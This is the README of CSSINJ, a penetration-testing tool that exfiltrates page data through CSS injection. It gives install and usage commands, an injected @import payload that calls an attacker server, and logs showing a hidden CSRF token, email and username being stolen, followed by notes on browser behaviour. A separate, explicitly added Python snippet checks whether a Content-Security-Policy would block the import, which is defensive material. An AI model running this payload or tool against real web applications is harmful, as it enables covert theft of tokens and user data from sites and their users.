_____ _____ _____ _____ _ _ _ _____ __ __
/ ____| / ____| / ____||_ _|| \ | | | | | __ \ \ \ / /
| | | (___ | (___ | | | \| | | | | |__) | \ \_/ /
| | \___ \ \___ \ | | | . ` | _ | | | ___/ \ /
| |____ ____) | ____) | _| |_ | |\ || |__| | _ | | | |
\_____||_____/ |_____/ |_____||_| \_| \____/ (_)|_| |_|
CSSINJ is a penetration testing tool that exploits CSS injection vulnerabilities to exfiltrate sensitive information from web applications. This tool is designed for security professionals to assess the security posture of web applications by demonstrating how CSS can be used to extract data covertly.
To install CSSINJ, run the following command:
```bash
pip install cssinj
```

Now you're ready to use CSSINJ!
```
python3 -m cssinj [-h] -H HOSTNAME -p PORT [-e ELEMENT] [-a ATTRIBUT] [-d] [-m {recusive,font-face}] [-o OUTPUT]
```

| Option | Description |
|---|---|
| `-h, --help` | Show help message and exit |
| `-H, --hostname` | Attacker hostname or IP address |
| `-p, --port` | Port number of the attacker |
| `-e, --element` | HTML element to extract specific data |
| `-a, --attribut` | Specify an element Attribute Selector for exfiltration |
| `-d, --details` | Show detailed logs of the exfiltration process, including extracted data |
| `-m, --method` | Specify the type of exfiltration (recursive or font-face) |
| `-t, --timeout` | Timeout in seconds before considering exfiltration complete (default: 3.0) |
| `-o, --output` | File to store the exfiltrated data in JSON format |
```html
<h1>Welcome on my page !</h1>
<input type="text" id="username" value="admin" disabled>
<input type="email" id="email" value="admin@admin.XX" disabled>
<input type="text" class="csrf" value="MySecretAdminToken" hidden>
<img src="XXXXXXXXXXX.XX">
...
<style>
    @import url('//localhost:5005/start');
</style>
...
```

```
~ python3 -m cssinj inject -H 127.0.0.1 -p 5005 -e input
[2025-03-11 03:06:49] Attacker's server started on 127.0.0.1:5005
[2025-03-11 03:06:49] Connection from ::1
[2025-03-11 03:06:49] ID : 1
[2025-03-11 03:06:49] [1] - The value exfiltrated from input is : MySecretAdminToken
[2025-03-11 03:06:49] [1] - The value exfiltrated from input is : admin@admin.XX
[2025-03-11 03:06:49] [1] - The value exfiltrated from input is : admin
```

```
~ python3 -m cssinj -H 127.0.0.1 -p 5005 -e * -a src
[2025-03-11 03:06:49] Attacker's server started on 127.0.0.1:5005
[2025-03-11 03:06:49] Connection from ::1
[2025-03-11 03:06:49] ID : 1
[2025-03-11 03:06:49] [1] - The src exfiltrated from * is : XXXXXXXXXXX.XX
```

```
~ python3 -m cssinj -H 127.0.0.1 -p 5005 -e h1 --method font-face
[2025-05-21 03:06:49] Attacker's server started on 127.0.0.1:5005
[2025-05-21 03:06:49] Connection from 127.0.0.1
[2025-05-21 03:06:49] ID : 1
[2025-05-21 03:06:49] [1] - Exfiltrating element 0 :
[2025-05-21 03:06:49] [1] - Exfiltrating element 0 : e
[2025-05-21 03:06:49] [1] - Exfiltrating element 0 : W
[2025-05-21 03:06:49] [1] - Exfiltrating element 0 : l
[2025-05-21 03:06:49] [1] - Exfiltrating element 0 : c
[2025-05-21 03:06:49] [1] - Exfiltrating element 0 : o
[2025-05-21 03:06:49] [1] - Exfiltrating element 0 : m
[2025-05-21 03:06:49] [1] - Exfiltrating element 0 : n
[2025-05-21 03:06:49] [1] - Exfiltrating element 0 : y
[2025-05-21 03:06:49] [1] - Exfiltrating element 0 : p
[2025-05-21 03:06:49] [1] - Exfiltrating element 0 : a
[2025-05-21 03:06:49] [1] - Exfiltrating element 0 : g
[2025-05-21 03:06:49] [1] - Exfiltrating element 0 : !
```

The success of CSS injection attacks using @import depends on the browser's handling of CSS imports:
- Chromium-based browsers (Chrome, Edge, Brave, etc.) allow recursive CSS imports and will process the injected styles, making them vulnerable to exfiltration techniques using @import.
- Firefox, however, handles @import differently:
  - Unlike Chromium-based browsers, Firefox processes all @import rules before applying any styles.
  - As a result, the attack fails because the browser never processes the CSS selectors, preventing data exfiltration.
  - This behavior causes an infinite loop where the browser keeps waiting for a CSS update that never happens.

This difference in behavior makes Chromium-based browsers more susceptible to CSS injection exfiltration, while Firefox provides better protection against such attacks.
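
On the mitigation side, the following added example (not part of CSSINJ or its README) checks whether a given Content-Security-Policy would permit the `@import` fetch shown in the injection example above. The page URL, the sample policy and all function names are assumptions made for illustration, and the source matching is simplified (no paths, no IPv6 literals, strict `'self'` origin match).

```python
from urllib.parse import urljoin, urlsplit

DEFAULT_PORT = {"http": 80, "https": 443}
PAGE = "https://app.example/profile"   # constructed page URL (assumption)
IMPORT = "//localhost:5005/start"      # @import target from the README's injection example

def parse_csp(header):
    policy = {}
    for part in header.split(";"):
        tokens = part.lower().split()
        if tokens:
            policy.setdefault(tokens[0], tokens[1:])  # first occurrence of a directive wins
    return policy

def origin(url):
    u = urlsplit(url)
    return u.scheme, u.hostname or "", u.port or DEFAULT_PORT.get(u.scheme)

def source_allows(src, url, page_url):
    """Simplified CSP source-expression match for one URL (paths are ignored)."""
    scheme, host, port = origin(url)
    if src == "'self'":
        return origin(page_url) == (scheme, host, port)
    if src == "*":
        return scheme in DEFAULT_PORT
    if src.startswith("'"):   # 'none', 'unsafe-inline', nonces and hashes never match a URL
        return False
    if src.endswith(":"):     # scheme-source such as https:
        return src[:-1] == scheme
    s_scheme, sep, rest = src.partition("://")
    if not sep:               # host-source without a scheme: the page's scheme applies
        s_scheme, rest = origin(page_url)[0], src
    s_host, _, s_port = rest.split("/")[0].partition(":")
    wanted = int(s_port) if s_port.isdigit() else DEFAULT_PORT.get(scheme)
    host_ok = s_host in ("*", host) or (s_host[:2] == "*." and host.endswith(s_host[1:]))
    scheme_ok = s_scheme == scheme or (s_scheme, scheme) == ("http", "https")
    return host_ok and scheme_ok and (s_port == "*" or port == wanted)

def import_allowed(csp_header, import_url, page_url):
    """True if the policy lets a stylesheet @import fetch import_url from page_url."""
    policy = parse_csp(csp_header)
    target = urljoin(page_url, import_url)  # resolves the protocol-relative //host form
    for name in ("style-src-elem", "style-src", "default-src"):  # CSP fallback order
        if name in policy:
            return any(source_allows(s, target, page_url) for s in policy[name])
    return True  # no governing directive, so the fetch is unrestricted

if __name__ == "__main__":
    print(import_allowed("style-src 'self' 'unsafe-inline'", IMPORT, PAGE))  # False
```

`'unsafe-inline'` only admits the inline `<style>` element itself; the imported stylesheet URL is still matched against the source list, so a wildcard or broad scheme source there reopens the fetch.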
- General:
  - Add error handler
  - File error handler
  - Add test
  - Edit terminal
  - Add error handler
- Injection:
  - Add timeout for font-face exfiltration
- Complete Exfiltration (Blind):
  - 0. Complete DOM objects
  - 1. Get structure of the HTML (tags)
  - 2. Get all attributes for each element
  - 3. Get all values for each attribute
  - 4. Get text using font-face exfiltration

This tool is intended only for ethical hacking and security research. Unauthorized use on systems without explicit permission is illegal. The developer is not responsible for any misuse of this tool.
CSSINJ was developed by DonAsako.